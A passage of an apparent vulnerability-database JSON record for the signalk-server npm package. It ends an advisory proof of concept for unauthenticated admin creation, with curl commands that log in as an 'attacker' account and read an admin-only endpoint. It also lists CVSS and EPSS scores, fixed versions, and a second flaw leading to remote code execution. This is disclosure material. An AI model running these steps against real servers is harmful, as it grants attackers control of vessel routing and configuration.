vulnerability: The server fails to reject the request and creates the second admin).\n```\n\n**Verify Both Admins Exist**: Login via JWT as the attacker and query the restricted users endpoint.\n\n```\n# Get Token for Attacker\nTOKEN=$(curl -s -X POST http://localhost:3000/signalk/v1/auth/login \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\": \"attacker\", \"password\": \"password123\"}' | jq -r .token)\n```\n```\n# Access Admin-Only Data\ncurl -H \"Authorization: Bearer $TOKEN\" http://localhost:3000/skServer/security/users\nResult: The system returns both admin and attacker as active Administrators.\n```\n\n<img width=\"1205\" height=\"469\" alt=\"Screenshot 2026-03-24 145906\" src=\"https://github.com/user-attachments/assets/98855e54-cb78-4786-a9e3-63dcc1bed37a\" />\n\n## Security Impact\nAn unauthenticated attacker can gain full Administrator access to the SignalK server at any time, allowing them to modify sensitive vessel routing data, alter server configurations, and access restricted endpoints", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33950", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09318", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09243", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09301", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09299", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33950" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.4", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T18:00:30Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.24.0-beta.4" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-x8hc-fqv3-7gwf", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-03T18:00:30Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-x8hc-fqv3-7gwf" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33950", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33950" }, { "reference_url": "https://github.com/advisories/GHSA-x8hc-fqv3-7gwf", "reference_id": "GHSA-x8hc-fqv3-7gwf", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x8hc-fqv3-7gwf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/111230?format=api", "purl": "pkg:npm/signalk-server@2.24.0-beta.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-veqf-x77b-4bf7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.24.0-beta.4" } ], "aliases": [ "CVE-2026-33950", "GHSA-x8hc-fqv3-7gwf" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-xvyj-f4ps-kycx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49553?format=api", "vulnerability_id": "VCID-yktb-859h-y7hs", "summary": "Signal K Server has Unauthenticated State Pollution leading to Remote Code Execution (RCE)\nAn unauthenticated attacker can pollute the internal state (`restoreFilePath`) of the server via the `/skServer/validateBackup` endpoint. This allows the attacker to hijack the administrator's \"Restore\" functionality to overwrite critical server configuration files (e.g., `security.json`, `package.json`), leading to account takeover and Remote Code Execution (RCE).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66398", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00139", "scoring_system": "epss", "scoring_elements": "0.33634", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00139", "scoring_system": "epss", "scoring_elements": "0.33669", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00139", "scoring_system": "epss", "scoring_elements": "0.33703", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00139", "scoring_system": "epss", "scoring_elements": "0.33689", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66398" }, { "reference_url": "https://github.com/SignalK/signalk-server", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server" }, { "reference_url": "https://github.com/SignalK/signalk-server/commit/5c211eaf33f0ccadbaed6720264780d92afbd7f8", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/SignalK/signalk-server/commit/5c211eaf33f0ccadbaed6720264780d92afbd7f8" }, { "reference_url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-05T21:00:27Z/" } ], "url": "https://github.com/SignalK/signalk-server/releases/tag/v2.19.0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66398", "reference_id": "CVE-2025-66398", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66398" }, { "reference_url": "https://github.com/advisories/GHSA-w3x5-7c4c-66p9", "reference_id": "GHSA-w3x5-7c4c-66p9", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w3x5-7c4c-66p9" }, { "reference_url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9", "reference_id": "GHSA-w3x5-7c4c-66p9", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-01-05T21:00:27Z/" } ], "url": "https://github.com/SignalK/signalk-server/security/advisories/GHSA-w3x5-7c4c-66p9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73159?format=api", "purl": "pkg:npm/signalk-server@2.19.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2e2f-qt4n-dqa7" }, { "vulnerability": "VCID-3s8j-v31f-pyaf" }, { "vulnerability": "VCID-jq2a-wxb1-dufm" }, { "vulnerability": "VCID-ndfm-uuf3-nbfg" }, { "vulnerability": "VCID-v11p-jkzw-vkar" }, { "vulnerability": "VCID-xvyj-f4ps-kycx" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.19.0" } ], "aliases": [ "CVE-2025-66398", "GHSA-w3x5-7c4c-66p9" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yktb-859h-y7hs" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/signalk-server@2.13.4" }